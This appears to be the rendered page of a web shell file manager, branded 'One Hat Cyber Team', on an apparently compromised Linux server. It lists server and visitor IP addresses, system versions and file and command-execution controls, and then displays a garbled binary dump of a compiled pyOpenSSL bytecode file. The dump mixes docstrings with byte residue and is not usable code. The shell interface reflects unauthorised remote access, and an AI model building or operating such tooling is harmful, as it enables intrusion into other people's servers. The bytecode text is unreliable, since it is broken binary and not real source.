⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
OpenSSL
/
__pycache__
/
View File Name :
_util.cpython-312.pyc
f X d dl Z d dlZd dlZd dlmZmZmZmZmZ d dl m Z eeee j f Z e Zej Zej" Zej% d ZdedefdZd ee defd Zdee deegef fdZd edefdZd edefdZ e ZdZdededefdZy) N)AnyCallableNoReturnTypeUnion)BindingF)should_clear_after_alloccharpreturnc P | syt j | j d S )z Get a native string type representing of the given CFFI ``char*`` object. :param charp: A C-style string represented using CFFI. :return: :class:`str` utf-8)ffistringdecode)r s //usr/lib/python3/dist-packages/OpenSSL/_util.pytextr s$ ::e##G,, exception_typec g } t j }|dk( rni|j t t j | t t j | t t j | f | | )ac Convert an OpenSSL library failure into a Python exception. When a call to the native OpenSSL library fails, this is usually signalled by the return value, and an error code is stored in an error queue associated with the current thread. The err library provides functions to obtain these error codes and textual error messages. r )lib ERR_get_errorappendr ERR_lib_error_stringERR_func_error_stringERR_reason_error_string)r errorserrors r exception_from_error_queuer " s F !!#A: S--e45S..u56S0078 r r c $ dt ddf fd}|S )z~ Create an assert function that uses :func:`exception_from_error_queue` to raise an exception wrapped by *error*. okr Nc &